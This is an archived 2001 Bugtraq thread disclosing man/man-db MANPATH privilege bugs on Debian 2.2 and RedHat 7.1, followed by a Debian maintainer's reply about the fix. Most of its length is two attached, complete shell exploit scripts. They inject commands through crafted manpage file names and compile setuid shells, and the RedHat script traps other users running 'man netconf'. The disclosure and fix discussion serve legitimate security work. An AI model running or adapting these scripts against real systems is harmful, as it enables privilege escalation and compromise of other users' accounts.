6579378 2001-06-04 13:03 +0700 /49 rader/ Luki R . <luki@karet.org>
Sänt av: joel@lysator.liu.se
Importerad: 2001-06-04 17:10 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Externa svar till: luki@karet.org
Mottagare: Bugtraq (import) <17239>
Ärende: man/man-db MANPATH bugs exploit
------------------------------------------------------------
Hi,
In some conditions, man allow user's PATH env. to be inserted as
manpath. Man then use manpath value for searching directories
contain manpages. This is ok until man forgot to drop privilledges
when creating cat pages cache files using user's supplied PATH.
I've successfully try this on 2 different man system, debian's and
redhat's. Yes, this is not a new bugs since debian hax fixed it on
man-db 2.3.18-6 in unstable (hi Colin Watson :)) and 2.3.16-4. and
for redhat see redhat's bugzilla #43213 Sorry if this is already
mentioned before.
Attached is a complete proof of concept exploit script for
redhat7.1 and Debian2.2. for your convenience.
I just want to say that the impact is not only creating files owned
by man uid/gid but combined with symlinks and other tricks, the
results are:
[1] On debian's man-db (<= 2.3.17-3.2, 2.3.16-3):
instant user 'man' setuid shell
(as user 'man' you may do something tricky to be root)
[2] On RedHat's man (<= man-1.5h1-20):
(trivial) executing any binary, ie. to make any user's suidshell,
including root
However, to produce a succesfull exploit we must met the conditions:
- man system that write catpages cache [1] & [2]
- suid / sgid man binaries [1] & [2] (to be able to write to cache
dirs)
- there is a command which have no manpages (coz we will create it ;p
) [2]
- victim user must then executed 'man <command with no manpage>' [2]
see the exploits for details.
Have a nice day,
[----- jenggo (luki@karet.org) -----]
PS:
(halo, ada yg tertarik untuk ngulik supaya jadi root di redhat ? ;P)
trully greets to: echo, mayonaise and others @ #karet
Mr.gus, mega, amien, akbar ...damai, damai
(6579378) /Luki R . <luki@karet.org>/-----(Ombruten)
Bilaga (application/x-sh) i text 6579379
Bilaga (application/x-sh) i text 6579380
6579379 2001-06-04 13:03 +0700 /102 rader/ Luki R . <luki@karet.org>
Importerad: 2001-06-04 17:10 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Externa svar till: luki@karet.org
Mottagare: Bugtraq (import) <17240>
Bilaga (text/plain) till text 6579378
Ärende: Bilaga till: man/man-db MANPATH bugs exploit
------------------------------------------------------------
#!/bin/sh
###################################################
# Fri Jun 1 23:00:10 JAVT 2001 #
# ----------------------------------------------- #
# man MANPATH symlink redirection bugs #
# proof of concept. #
# version affected: #
# <= man-db 2.3.16-3,2.3.17-3.2 #
# #
# tested on: #
# debian2.2 -> instant man suidshell #
# #
# by jenggo <luki@karet.org> #
# #
# thanx to: echo, mayonaise all @ #karet #
# ==> Mr.dur,amien,mega,akbar ... damai,damai ;) #
###################################################
TMPDIR=/tmp/mywork
RAND=`/bin/date +%S`
echo "making working dir ..."
/bin/mkdir -p $TMPDIR/man/man1
/bin/chmod 777 $TMPDIR
/bin/chmod 777 $TMPDIR/man
echo "copying needed files ..."
if [ ! -x /usr/bin/groff ] || [ ! -x /usr/bin/grotty ] || [ ! -x /usr/bin/troff ] || [ ! -x /usr/bin/gcc ]; then
echo "Failed, I need executable : groff,grotty,troff,gcc"
echo "cleaning up ..."
/bin/rm -rf $TMPDIR
fi
/bin/cp /usr/bin/groff $TMPDIR
/bin/cp /usr/bin/grotty $TMPDIR
/bin/cp /usr/bin/troff $TMPDIR
echo "compiling helper ..."
/bin/cat > $TMPDIR/hehe.c <<EOF
#include <stdio.h>
int main()
{
char *aa[2]={"/bin/sh", NULL};
setreuid(6,6);
execve(aa[0], aa, NULL);
exit(0);
}
EOF
/usr/bin/gcc $TMPDIR/hehe.c -o $TMPDIR/hehe 2>/dev/null 1>/dev/null
/bin/cat > $TMPDIR/mandeb.c <<EOF
#include <stdio.h>
int main()
{
seteuid(6);
setuid(6);
system("/bin/cp /tmp/mywork/hehe /tmp/huhu");
system("/bin/chown man /tmp/huhu");
system("/bin/chmod 4755 /tmp/huhu");
exit(0);
}
EOF
/usr/bin/gcc $TMPDIR/mandeb.c -o $TMPDIR/mandeb 2>/dev/null
1>/dev/null
echo "making our manpage ..." /bin/ln -s /var/cache/man/cat1
$TMPDIR/man/cat1 /bin/echo "bebas euy"|/bin/gzip -c >
$TMPDIR/man/man1/"cihuy$RAND.1.gz;cd ..;cd ..;cd ..;cd ..;cd ..;cd
tmp;cd mywork;export PATH=.;mandeb;echo ls.1.gz" /bin/touch
$TMPDIR/"cihuy$RAND.1.gz;cd ..;cd ..;cd ..;cd ..;cd ..;cd tmp;cd
mywork;export PATH=.;mandeb;echo ls" export PATH=$TMPDIR /usr/bin/man
"cihuy$RAND.1.gz;cd ..;cd ..;cd ..;cd ..;cd ..;cd tmp;cd
mywork;export PATH=.;mandeb;echo ls" 2> /dev/null 1>/dev/null
echo "/bin/ls -la /var/cache/man/cat1"
/bin/ls -la /var/cache/man/cat1
export PATH=/var/cache:/bin:/sbin:/usr/bin:/usr/sbin
echo "exploiting ..."
/bin/rm -f /tmp/huhu
/usr/lib/man-db/mandb 2>/dev/null 1>/dev/null
/bin/rm -rf /tmp/mywork
echo
echo "/bin/ls -la /tmp"
/bin/ls -la /tmp
if [ -u /tmp/huhu ]; then
echo "file /tmp/huhu is setuid. Hope it's owned by man"
echo "Have a nice day"
echo "[----- jenggo <luki@karet.org> -----]"
/tmp/huhu
else
echo "exploit failed, cleaning up our binary ..."
fi
echo "cleaning up our preparation step dir ..."
/bin/rm -rf /tmp/$TMPDIR
(6579379) /Luki R . <luki@karet.org>/-----(Ombruten)
6579380 2001-06-04 13:03 +0700 /151 rader/ Luki R . <luki@karet.org>
Importerad: 2001-06-04 17:10 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Externa svar till: luki@karet.org
Mottagare: Bugtraq (import) <17241>
Bilaga (text/plain) till text 6579378
Ärende: Bilaga till: man/man-db MANPATH bugs exploit
------------------------------------------------------------
#!/bin/sh
###################################################
# Fri May 18 22:08:42 JAVT 2001 #
# ----------------------------------------------- #
# man MANPATH symlink redirection bugs #
# proof of concept. #
# version affected: #
# <= man-1.5h1-20 #
# #
# tested on: #
# redhat7.1 -> any user suidshell #
# #
# by jenggo <luki@karet.org> #
# #
# thanx to: echo, mayonaise all @ #karet #
###################################################
# hmmm ... ada yang bisa modif jadi instant root ?? :P
# IMPORTANT !
# set this to command that has no man page
DEADLY_BIN="netconf"
# on <= redhat6.2 could be /var/cache/catman
CACHEDIR="/var/cache/man"
CACHEDIR2="/var/cache/catman"
GZ="/bin/gzip"
echo -n "check man dir ..."
if [ ! -d $CACHEDIR ]; then
if [ -d $CACHEDIR2 ]; then
CACHEDIR=$CACHEDIR2
echo "OK"
else
echo "FAILED"
echo "check your man dir"
exit
fi
else
echo "OK"
fi
echo -n "checking sgid/suid man ..."
if [ ! -g /usr/bin/man ]; then
# is it a debian man?
if [ -d /usr/lib/man-db ]; then
echo "FAILED"
echo "I think this is debian style man, use other script"
else
echo "FAILED"
echo "can't find executables sgid man binary"
fi
exit
else
echo "OK"
fi
echo "making our man directory ..."
echo
mkdir -p /tmp/man/man1
mkdir /tmp/cat1
mkdir /tmp/mine
chmod 777 /tmp/mine
echo "creating our man page ..."
echo
echo "BEBAS EUY"|$GZ -c > /tmp/man/man1/huhuy.1.gz
echo "creating symlink ..."
echo
ln -s "$CACHEDIR/cat1/netconf.1.gz;cd ..;cd ..;cd ..;cd ..;cd tmp;cd
mine;export PATH=.;manx" /tmp/cat1/huhuy.1.gz
echo "creating our bogus command ..."
echo
touch /tmp/huhuy
echo "making manx shellscript"
echo
/bin/cat > /tmp/mine/manx <<EOF
#!/bin/sh
export PATH="/bin:/usr/bin:/sbin:/usr/sbin"
VICTIM=\`/usr/bin/id -u\`
/bin/cat >/tmp/mine/my"\$VICTIM".c <<EOG
#include <stdio.h>
void main()
{
char *hh[2]={"/bin/sh", NULL};
setreuid(\$VICTIM,\$VICTIM);
execve(hh[0], hh, NULL);
}
EOG
/usr/bin/gcc /tmp/mine/my"\$VICTIM".c -o /tmp/mine/my\$VICTIM
1>/dev/null 2>/dev/null
/bin/rm -f /tmp/mine/my"\$VICTIM".c 1>/dev/null 2>/dev/null
chmod 6755 /tmp/mine/my\$VICTIM 1>/dev/null 2>/dev/null
EOF
chmod 755 /tmp/mine/manx
if [ ! -x /tmp/mine/manx ]; then
echo "file: /tmp/mine/manx can't be set executable !"
echo "fix the exploit first"
echo "cleaning up ..."
/bin/rm -rf /tmp/man /tmp/cat1 /tmp/mine /tmp/huhuy
exit
fi
echo "prepare to exploit ..."
echo
export PATH=../../../../../../tmp
cd /
echo "exploiting ..."
echo
/usr/bin/man -d huhuy 2>/dev/null
export PATH=/bin:/usr/bin
echo "checking our exploit result"
echo
if [ -f "/var/cache/man/cat1/$DEADLY_BIN.1.gz;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mine;export PATH=.;manx" ]; then
echo "content of $CACHEDIR/cat1:"
ls -l $CACHEDIR/cat1
echo
echo "exploit OK, now wait till somebody run 'man $DEADLY_BIN'"
echo "and your suidshells will be waiting at /tmp/mine/* :)"
echo "bye."
echo "[-------- jenggo <luki@karet.org> --------]"
echo
else
echo "hrrmm ... exploit failed to create offending file !"
echo "check again please"
echo "cleaning up ..."
/bin/rm -rf /tmp/man /tmp/cat1 /tmp/mine /tmp/huhuy
fi
(6579380) /Luki R . <luki@karet.org>/-----(Ombruten)
6581444 2001-06-05 01:43 +0100 /43 rader/ Colin Watson <cjwatson@debian.org>
Sänt av: joel@lysator.liu.se
Importerad: 2001-06-05 07:46 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17255>
Kommentar till text 6579378 av Luki R . <luki@karet.org>
Ärende: Re: man/man-db MANPATH bugs exploit
------------------------------------------------------------
From: Colin Watson <cjwatson@debian.org>
To: bugtraq@securityfocus.com
Message-ID: <E1574wk-0004BD-00@riva.ucam.org>
In article <20010604130304.A4657@gringgo>,
"Luki R ." <luki@karet.org> wrote:
>In some conditions, man allow user's PATH env. to be inserted as manpath.
>Man then use manpath value for searching directories contain manpages.
>This is ok until man forgot to drop privilledges when creating cat pages
>cache files using user's supplied PATH.
>
>I've successfully try this on 2 different man system, debian's and redhat's.
>Yes, this is not a new bugs since debian hax fixed it on man-db 2.3.18-6
>in unstable (hi Colin Watson :)) and 2.3.16-4.
Heh, thanks. I should note that it had already been fixed in 2.3.18
(i.e. 2.3.18-1 - so really everything up to 2.3.16-3 in stable and
2.3.17.1-5 in testing/unstable is vulnerable), as I decided that that
particular change was a good idea on general principles. I didn't know
that it was exploitable until you filed your bug, so I hadn't updated
the stable release. However, as far as I know this will be fixed in
Debian 2.2r4, and in the meantime you can get 2.3.16-4 from
proposed-updates.
Easy lesson from this bug, and one I doubt is unique to man: if you
have functions to drop and regain effective privileges in a set[ug]id
program, make sure they nest properly. In this case, man did some
things "with dropped privileges" while privileges were already
dropped, and thus regained them too early in a few cases.
>- suid / sgid man binaries [1] & [2] (to be able to write to cache dirs)
FYI, as of Debian man-db 2.3.18-3, man and mandb are shipped
unprivileged (the user is asked if (s)he wants them setuid, but the
default is no). Cat pages and database updates are nice and all that,
but patching security holes was getting very old very quickly.
Thanks for your report,
--
Colin Watson [cjwatson@debian.org]
(6581444) /Colin Watson <cjwatson@debian.org>/(Ombruten)